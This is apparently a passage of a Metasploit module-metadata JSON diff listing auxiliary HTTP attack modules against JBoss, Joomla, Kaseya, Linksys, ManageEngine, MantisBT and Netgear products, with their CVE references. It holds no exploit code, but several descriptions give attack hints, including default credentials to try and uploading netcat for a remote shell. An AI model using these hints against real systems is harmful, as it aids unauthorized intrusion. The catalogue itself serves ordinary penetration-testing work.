+0000", + "path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/ivanti_vtm_admin", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/jboss_bshdeployer": { + "name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment", + "fullname": "auxiliary/admin/http/jboss_bshdeployer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "us3r777 " + ], + "description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.", + "references": [ + "CVE-2010-0738", + "OSVDB-64171", + "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_bshdeployer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Deploy", + "description": "Create and deploy app (WAR) to deliver payload" + }, + { + "name": "Undeploy", + "description": "Remove app (WAR) for cleanup" + } + ] + }, + 
"auxiliary_admin/http/jboss_deploymentfilerepository": { + "name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment", + "fullname": "auxiliary/admin/http/jboss_deploymentfilerepository", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "us3r777 " + ], + "description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.", + "references": [ + "CVE-2010-0738", + "OSVDB-64171", + "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_deploymentfilerepository", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Deploy", + "description": "Create and deploy app (WAR) to deliver payload" + }, + { + "name": "Undeploy", + "description": "Remove app (WAR) for cleanup" + } + ] + }, + "auxiliary_admin/http/jboss_seam_exec": { + "name": "JBoss Seam 2 Remote Command Execution", + "fullname": "auxiliary/admin/http/jboss_seam_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-19", + "type": "auxiliary", + "author": [ + "guerrino di massa", + "Cristiano Maruti " + ], + "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) 
expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.", + "references": [ + "CVE-2010-1871", + "OSVDB-66881" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_seam_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/joomla_registration_privesc": { + "name": "Joomla Account Creation and Privilege Escalation", + "fullname": "auxiliary/admin/http/joomla_registration_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-10-25", + "type": "auxiliary", + "author": [ + "Fabio Pires ", + "Filipe Reis ", + "Vitor Oliveira " + ], + "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. 
If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).", + "references": [ + "CVE-2016-8869", + "CVE-2016-8870", + "URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html", + "URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html", + "URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/joomla_registration_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/kaseya_master_admin": { + "name": "Kaseya VSA Master Administrator Account Creation", + "fullname": "auxiliary/admin/http/kaseya_master_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-09-23", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. 
This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.", + "references": [ + "CVE-2015-6922", + "ZDI-15-448", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", + "URL-https://seclists.org/bugtraq/2015/Sep/132" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/kaseya_master_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/katello_satellite_priv_esc": { + "name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization", + "fullname": "auxiliary/admin/http/katello_satellite_priv_esc", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-24", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.", + "references": [ + "CVE-2013-2143", + "CWE-862", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", + "is_install_path": true, + "ref_name": "admin/http/katello_satellite_priv_esc", + "check": false, + 
"post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/limesurvey_file_download": { + "name": "Limesurvey Unauthenticated File Download", + "fullname": "auxiliary/admin/http/limesurvey_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-10-12", + "type": "auxiliary", + "author": [ + "Pichaya Morimoto", + "Christian Mehlmauer " + ], + "description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.", + "references": [ + "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/", + "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015", + "URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/limesurvey_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_e1500_e2500_exec": { + "name": "Linksys E1500/E2500 Remote Command Execution", + "fullname": "auxiliary/admin/http/linksys_e1500_e2500_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n 
Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.", + "references": [ + "OSVDB-89912", + "BID-57760", + "EDB-24475", + "URL-http://www.s3cur1ty.de/m1adv2013-004" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_e1500_e2500_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": { + "name": "Linksys WRT120N tmUnblock Stack Buffer Overflow", + "fullname": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-19", + "type": "auxiliary", + "author": [ + "Craig Heffner", + "Michael Messner " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.", + "references": [ + "EDB-31758", + "OSVDB-103521", + "URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 
14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_wrt54gl_exec": { + "name": "Linksys WRT54GL Remote Command Execution", + "fullname": "auxiliary/admin/http/linksys_wrt54gl_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-18", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. 
Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.", + "references": [ + "URL-http://www.s3cur1ty.de/m1adv2013-01", + "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl", + "EDB-24202", + "BID-57459", + "OSVDB-89421" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_wrt54gl_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manage_engine_dc_create_admin": { + "name": "ManageEngine Desktop Central Administrator Account Creation", + "fullname": "auxiliary/admin/http/manage_engine_dc_create_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-31", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. 
It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.", + "references": [ + "CVE-2014-7862", + "OSVDB-116554", + "URL-https://seclists.org/fulldisclosure/2015/Jan/2", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt" + ], + "platform": "", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-08 10:51:35 +0000", + "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/manage_engine_dc_create_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_dir_listing": { + "name": "ManageEngine Multiple Products Arbitrary Directory Listing", + "fullname": "auxiliary/admin/http/manageengine_dir_listing", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-28", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. 
Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.", + "references": [ + "CVE-2014-7863", + "OSVDB-117696", + "URL-https://seclists.org/fulldisclosure/2015/Jan/114", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_dir_listing", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_file_download": { + "name": "ManageEngine Multiple Products Arbitrary File Download", + "fullname": "auxiliary/admin/http/manageengine_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-28", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. 
Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.", + "references": [ + "CVE-2014-7863", + "OSVDB-117695", + "URL-https://seclists.org/fulldisclosure/2015/Jan/114", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_file_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_pmp_privesc": { + "name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection", + "fullname": "auxiliary/admin/http/manageengine_pmp_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-08", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. 
PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.", + "references": [ + "CVE-2014-8499", + "OSVDB-114485", + "URL-https://seclists.org/fulldisclosure/2014/Nov/18", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt" + ], + "platform": "", + "arch": "", + "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_pmp_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/mantisbt_password_reset": { + "name": "MantisBT password reset", + "fullname": "auxiliary/admin/http/mantisbt_password_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-04-16", + "type": "auxiliary", + "author": [ + "John (hyp3rlinx) Page", + "Julien (jvoisin) Voisin" + ], + "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.", + "references": [ + "CVE-2017-7615", + "EDB-41890", + "URL-https://mantisbt.org/bugs/view.php?id=22690", + "URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt" + ], + "platform": "Linux,Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 
14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/mantisbt_password_reset", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/mutiny_frontend_read_delete": { + "name": "Mutiny 5 Arbitrary File Read and Delete", + "fullname": "auxiliary/admin/http/mutiny_frontend_read_delete", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-15", + "type": "auxiliary", + "author": [ + "juan vazquez " + ], + "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. 
The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.", + "references": [ + "CVE-2013-0136", + "US-CERT-VU-701572", + "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", + "is_install_path": true, + "ref_name": "admin/http/mutiny_frontend_read_delete", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Delete", + "description": "Delete arbitrary file" + }, + { + "name": "Read", + "description": "Read arbitrary file" + } + ] + }, + "auxiliary_admin/http/netflow_file_download": { + "name": "ManageEngine NetFlow Analyzer Arbitrary File Download", + "fullname": "auxiliary/admin/http/netflow_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-30", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. 
Note that when typing Windows paths, you\n must escape the backslash with a backslash.", + "references": [ + "CVE-2014-5445", + "OSVDB-115340", + "URL-https://seclists.org/fulldisclosure/2014/Dec/9", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/netflow_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_auth_download": { + "name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download", + "fullname": "auxiliary/admin/http/netgear_auth_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-02-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.", + "references": [ + "CVE-2016-1524", + "US-CERT-VU-777024", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", + "URL-https://seclists.org/fulldisclosure/2016/Feb/30" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 
+0000", + "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_auth_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_pnpx_getsharefolderlist_auth_bypass": { + "name": "Netgear PNPX_GetShareFolderList Authentication Bypass", + "fullname": "auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-09-06", + "type": "auxiliary", + "author": [ + "Unknown", + "Grant Willcox" + ], + "description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n unauthenticated attackers to reveal the password for the admin user that is used to log into the\n router's administrative portal, in plaintext.\n\n Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes\n the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n admin user. 
This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.", + "references": [ + "URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133", + "URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "RelatedModules": [ + "exploit/linux/telnet/netgear_telnetenable" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_r6700_pass_reset": { + "name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset", + "fullname": "auxiliary/admin/http/netgear_r6700_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-15", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro ", + "Radek Domanski ", + "gwillcox-r7" + ], + "description": "This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),\n on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset\n the password for the 'admin' user back to its factory default of 'password'. 
Authentication is bypassed by\n using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent\n computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only\n supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58\n firmware, however support for other firmware versions may be added in the future.\n\n Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a\n special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can\n then log into this telnet server using the new password, and obtain a shell as the \"root\" user.\n\n These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.\n It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.\n As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit\n this vulnerability once per reboot of the router.\n\n This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n Radek Domanski).", + "references": [ + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md", + "URL-https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders", + "CVE-2020-10923", + "CVE-2020-10924", + "ZDI-20-703", + "ZDI-20-704" + ], + "platform": "", + "arch": "", + "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb", + "is_install_path": true, 
